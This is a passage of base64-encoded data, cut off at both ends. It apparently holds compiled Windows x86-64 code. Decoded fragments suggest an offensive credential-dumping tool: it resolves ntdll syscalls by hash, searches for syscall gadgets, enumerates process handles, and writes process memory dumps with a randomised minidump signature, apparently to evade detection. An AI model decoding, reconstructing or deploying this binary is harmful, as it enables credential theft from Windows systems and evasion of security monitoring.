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IXAD4VO////6wGQSIN9+AB1CrgAAAAA6TEDAABIi0X4i0AYiUXkSItF+ItAHInCSItF8EgB0EiJRZBIi0X4i0AgicJIi0XwSAHQSIlFiEiLRfiLQCSJwkiLRfBIAdBIiUWAx0XgAAAAAEiNBVwNAQBIiYV4////i0Xkg+gBicBIjRSFAAAAAEiLRYhIAdCLAInCSItF8EgB0EiJhXD///9Ii4Vw////D7cAZj1ad3V0i0XgSMHgBEiJwkiLhXj///9IjRwCSIuFcP///0iJweis/f//iQOLReSD6AGJwEiNFABIi0WASAHQD7cAD7fASI0UhQAAAABIi0WQSAHQi1XgSInRSMHhBEiLlXj///9IAcqLAIlCBINF4AGBfeD0AQAAdBCDbeQBg33kAA+FRf///+sBkItF4IkFhgwBAMdF3AAAAADpWgEAAMdF2AAAAADpNQEAAItF2EjB4ARIicJIi4V4////SAHQi1AEi0XYg8ABicBIweAESInBSIuFeP///0gByItABDnCD4b2AAAASMeFQP///wAAAABIx4VI////AAAAAItF2EjB4ARIicJIi4V4////SAHQiwCJhUD///+LRdhIweAESInCSIuFeP///0gB0ItABImFRP///4tF2IPAAYnASMHgBEiJwkiLhXj///9IAdCLVdhIidFIweEESIuVeP///0gByosAiQKLRdiDwAGJwEjB4ARIicJIi4V4////SAHQi1XYSInRSMHhBEiLlXj///9IAcqLQASJQgSLRdiDwAGJwEjB4ARIicJIi4V4////SAHCi4VA////iQKLRdiDwAGJwEjB4ARIicJIi4V4////SAHCi4VE////iUIEg0XYAYsFMwsBACtF3IPoATlF2A+Ctv7//4NF3AGLBRoLAQCD6AE5RdwPgpT+//9Ii4V4////SIPAEItQBEiLhXj///+LSASJ0CnIiYVs////x0XUAAAAAOtZi0XUSMHgBEiJwkiLhXj///9IAdCLQASJwkiLRfBIAdBIiYVg////i0XUSMHgBEiJwkiLhXj///9IjRwCi5Vs////SIuFYP///0iJwegb+v//SIlDCINF1AGLBYQKAQCD6AE5RdRymbgBAAAASIHE6AAAAFtdw1VIieVIg+wwiU0Q6Hf7//+FwHUHuP/////rO8dF/AAAAADrIotF/EjB4ARIicJIjQVACgEAiwQCOUUQdQWLRfzrFINF/AGLBSEKAQA5Rfxy07j/////SIPEMF3DVUiJ5UiD7DCJTRDoG/v//4XAdQe4AAAAAOtNx0X8AAAAAOs0i0X8SMHgBEiJwkiNBeQJAQCLBAI5RRB1F4tF/EjB4ARIicJIjQXTCQEASIsEAusUg0X8AYsFswkBADlF/HLBuAAAAABIg8QwXcNIx8AAAAAAw5APC0iLBCTDkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuQ8qm80AAAAAUUiD7CjoV////0iDxChZUEiD7Cjo7P7//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuS8av/8AAAAAUUiD7Cjo/f7//0iDxChZUEiD7Cjokv7//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8FndYsRUUiD7Cjopv7//0iDxChZUEiD7CjoO/7//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8E/01IiUUiD7CjoT/7//0iDxChZUEiD7Cjo5P3//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuaIVqY8AAAAAUUiD7Cjo9f3//0iDxChZUEiD7Cjoiv3//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuSC8vL0AAAAAUUiD7Cjom/3//0iDxChZUEiD7CjoMP3//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GA6ZMDUUiD7CjoRP3//0iDxChZUEiD7Cjo2fz//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EyG6sXUUiD7Cjo7fz//0iDxChZUEiD7Cjogvz//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EbA5UFUUiD7Cjolvz//0iDxChZUEiD7CjoK/z//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EFL5MBUUiD7CjoP/z//0iDxChZUEiD7Cjo1Pv//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIubaOAZYAAAAAUUiD7Cjo5fv//0iDxChZUEiD7Cjoevv//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EaKrIkUUiD7Cjojvv//0iDxChZUEiD7CjoI/v//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuaDQOPUAAAAAUUiD7CjoNPv//0iDxChZUEiD7Cjoyfr//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkE